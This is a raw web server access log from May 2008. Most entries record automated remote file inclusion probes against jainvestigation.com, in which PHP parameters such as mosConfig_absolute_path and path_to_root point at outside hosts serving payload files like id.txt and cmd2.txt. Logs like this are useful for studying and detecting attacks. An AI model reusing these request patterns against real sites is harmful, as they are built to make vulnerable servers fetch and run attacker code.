88.84.149.101 - - [14/May/2008:22:23:30 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:23:30 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
88.84.149.101 - - [14/May/2008:22:23:30 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:23:31 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/cmd182182/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:23:31 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/cmd182182/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:23:38 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:23:38 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:23:45 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:23:45 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:23:46 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:23:57 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:23:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:24:05 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:24:05 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:24:05 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:24:07 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:24:07 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:24:09 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:24:10 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:24:14 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:24:15 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:24:21 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:24:22 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:24:22 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:24:22 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:24:22 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:24:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:24:27 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:24:27 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:24:41 -0700] "GET /logs/access_080503.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:24:41 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:24:41 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:25:24 -0700] "GET /logs/access_080429.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:25:24 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:25:25 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:25:34 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:25:35 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:25:35 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:25:49 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:25:49 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:25:49 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:25:50 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:25:51 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:25:51 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
80.67.24.2 - - [14/May/2008:22:25:59 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "jainvestigation.com"
80.67.24.2 - - [14/May/2008:22:26:00 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:26:01 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.23.179.9 - - [14/May/2008:22:26:03 -0700] "GET /order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.jainvestigation.com"
216.23.179.9 - - [14/May/2008:22:26:03 -0700] "GET /logs/order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.jainvestigation.com"
58.138.200.188 - - [14/May/2008:22:26:04 -0700] "GET /logs/access.log/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
58.138.200.188 - - [14/May/2008:22:26:09 -0700] "GET /?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "www.jainvestigation.com"
58.138.200.188 - - [14/May/2008:22:26:10 -0700] "GET /logs/?mosConfig_admin_path=http://www.vacancespreference.com/editor/arab.txt?? HTTP/1.1" 200 1939 "-" "libwww-perl/5.79" "www.jainvestigation.com"
216.23.179.9 - - [14/May/2008:22:26:16 -0700] "GET /order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "jainvestigation.com"
216.23.179.9 - - [14/May/2008:22:26:16 -0700] "GET /logs/order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:26:28 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:26:28 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:26:28 -0700] "GET /convert/mvcw.php?vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:26:29 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:26:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:26:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:26:44 -0700] "GET /logs/config.php?path_to_root=http://www.geocities.com/cmd182182/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:26:44 -0700] "GET /config.php?path_to_root=http://www.geocities.com/cmd182182/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:26:57 -0700] "GET /logs/access_080429.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:27:02 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:27:02 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
193.47.80.133 - - [14/May/2008:22:27:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://www.exalead.com/" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.jainvestigation.com"
193.47.80.133 - - [14/May/2008:22:27:07 -0700] "GET /assets/images/home1.gif HTTP/1.1" 404 275 "http://www.exalead.com/" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:27:12 -0700] "GET /logs/access_080429.log/convert/mvcw.php?vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:27:22 -0700] "GET /logs/order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:27:22 -0700] "GET /order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:27:26 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
87.106.16.18 - - [14/May/2008:22:27:42 -0700] "GET /logs/access.log/index2.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:27:42 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
87.106.16.18 - - [14/May/2008:22:27:42 -0700] "GET /index2.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:27:42 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:27:42 -0700] "GET /logs/access_080430.log/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:27:42 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
87.106.16.18 - - [14/May/2008:22:27:43 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:27:43 -0700] "GET /logs/access_080430.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:27:43 -0700] "GET /config/dbutil.bck.php?confdir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:27:44 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:27:44 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:27:44 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:27:55 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:27:55 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:27:56 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:28:03 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:28:03 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:28:04 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
61.250.89.219 - - [14/May/2008:22:28:16 -0700] "GET /logs/access.log/config.php?path_to_root=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
61.250.89.219 - - [14/May/2008:22:28:17 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
61.250.89.219 - - [14/May/2008:22:28:17 -0700] "GET /config.php?path_to_root=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
61.250.89.219 - - [14/May/2008:22:28:18 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
61.250.89.219 - - [14/May/2008:22:28:19 -0700] "GET /logs/config.php?path_to_root=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
61.250.89.219 - - [14/May/2008:22:28:19 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:28:29 -0700] "GET /logs/access_080501.log/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:28:29 -0700] "GET /logs/access_080501.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:28:29 -0700] "GET /config/dbutil.bck.php?confdir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:28:30 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:28:30 -0700] "GET /logs/config/dbutil.bck.php?confdir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:28:30 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:28:31 -0700] "GET /logs/access_080429.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:28:32 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:28:32 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:28:41 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
88.84.149.101 - - [14/May/2008:22:28:42 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
88.84.149.101 - - [14/May/2008:22:28:42 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
219.94.128.57 - - [14/May/2008:22:28:51 -0700] "GET /logs/access.log/index2.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
193.47.80.133 - - [14/May/2008:22:28:59 -0700] "GET /assets/images/home1.gif HTTP/1.1" 404 275 "http://www.exalead.com/" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:29:01 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:29:03 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:29:05 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:29:17 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:29:18 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
222.124.213.71 - - [14/May/2008:22:29:21 -0700] "GET /logs/access_080501.log//atom.php5?page=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
222.124.213.71 - - [14/May/2008:22:29:22 -0700] "GET //atom.php5?page=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:29:23 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:29:23 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
222.124.213.71 - - [14/May/2008:22:29:23 -0700] "GET /logs//atom.php5?page=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
